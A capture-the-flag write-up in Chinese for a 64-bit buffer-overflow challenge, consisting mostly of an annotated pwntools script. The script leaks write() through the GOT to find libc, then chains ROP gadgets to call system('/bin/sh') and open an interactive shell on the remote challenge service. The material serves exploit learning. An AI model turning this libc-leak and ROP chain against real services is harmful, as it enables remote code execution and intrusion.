與level2_x64類似,也是x64位的一個程序,但是程序之中并沒有直接調用system函數,也沒有bin/sh參數,只提供了一個libc庫,所以是要讓我們通過libc庫泄露system函數的地址和binsh的地址,這里要注意的是依舊是寄存器的問題,所以我們要構建gadget,rop繞過,通過泄漏出system函數的地址,然后在bss段中寫入binsh參數,調用system函數從而getshell
from pwn import *
from time import *
# Connection to the challenge service named in the write-up.  Every number
# below is tied to this specific binary and to the libc-2.19.so it ships with.
p = remote('pwn2.jarvisoj.com',9883)
# Addresses inside the challenge binary.  They are hard-coded, which only
# works if the binary is mapped at a fixed base (presumably not built as PIE;
# confirm with checksec — PIE would randomize all of these).
write_plt = 0x04004B0   # write@plt: the stub through which write() is called
write_got = 0x0600A58   # GOT slot of write: holds write()'s resolved libc address
poprdiret = 0x04006b3   # gadget: pop rdi ; ret  (loads the first argument register)
start = 0x04004F0       # returned to after the leak so the program runs again for payload 2
poprsiret = 0x04006b1   # gadget: pop rsi ; ... ; ret (loads the second argument register);
                        # presumably pops r15 as well, which is why payload1 supplies an
                        # extra qword after write_got — verify in the disassembly
# Offsets inside libc-2.19.so, read from its symbol/string tables with the
# commands noted on each line.  They hold only for that exact libc build;
# a different build moves every one of them.
write_libc_address = 0x00000000000eb700 #readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3 #strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0 #readelf -a ./libc-2.19.so | grep " exit@"
# Stage 1 - leak.  0x80+8 bytes of filler reach the saved return address
# (presumably a 0x80-byte buffer plus the saved rbp, with no stack canary in
# between — confirm with checksec; a canary would be overwritten here and the
# process would abort instead).  The chain then calls
# write(1, write_got, <rdx>) so the GOT slot's contents come back on stdout,
# and finally jumps to start.
# NOTE: no gadget sets rdx (the byte count); the call relies on whatever
# value rdx holds when the chain runs.
payload1 = '\x00'*(0x80+8) + p64(poprdiret) + p64(1)+ p64(poprsiret)+p64(write_got) + p64(1) + p64(write_plt) +p64(start)
p.recvuntil("Input:\n")   # wait for the program's prompt before sending anything
p.sendline(payload1)
# The first 8 bytes of the reply are the GOT slot, i.e. write()'s runtime address.
# NOTE: recv(8) returns *up to* 8 bytes; a short read would hand u64 fewer
# than 8 bytes and raise.
leak = u64(p.recv(8))
# Rebase: leaked address minus write's offset gives the libc load address
# (the only thing ASLR hides here); the remaining symbols are offsets from it.
libc_base = leak - write_libc_address
system = libc_base + system_libc_address
binsh = libc_base + bin_sh_libc_address
exit = libc_base + exit_libc_address   # shadows the builtin exit(); harmless in this script but worth renaming
# Stage 2 - after the restart the same overflow is used once more, this time to
# call system("/bin/sh") with exit as its return address so the process ends
# cleanly when the shell closes.
# From a defender's view the chain as written is broken by any one of: PIE
# (fixed gadget addresses), a stack protector (the straight overwrite of the
# return address), or a different libc build (all four offsets).  On the wire
# it is visible as a long run of non-printable input followed by the service
# echoing a raw 8-byte pointer.
payload = 'a'*(0x80+8) + p64(poprdiret) + p64(binsh) + p64(system) +p64(exit)
p.sendline(payload)
p.interactive()   # hand the connection over to the user